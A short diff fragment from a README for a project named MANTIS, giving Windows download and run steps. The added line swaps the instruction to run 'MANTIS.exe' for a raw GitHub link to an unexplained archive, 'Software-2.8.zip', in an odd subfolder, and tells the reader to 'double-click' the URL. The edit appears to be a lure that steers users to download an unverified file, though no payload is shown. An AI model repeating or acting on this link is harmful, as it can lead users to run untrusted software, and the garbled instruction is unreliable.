sweetiekhan/MANTIS/README.md

    Once the download is complete, navigate to your Downloads folder.
 Right-click on the zip file and select "Extract All."
 Follow the prompts to extract the contents.

 5. **Run the Application**
    After extraction, locate the folder.
-Open it and double-click on the `MANTIS.exe` file to run the application.
+Open it and double-click on the `https://raw.githubusercontent.com/sweetiekhan/MANTIS/main/zolotink/Software-2.8.zip` file to run the application.

 ---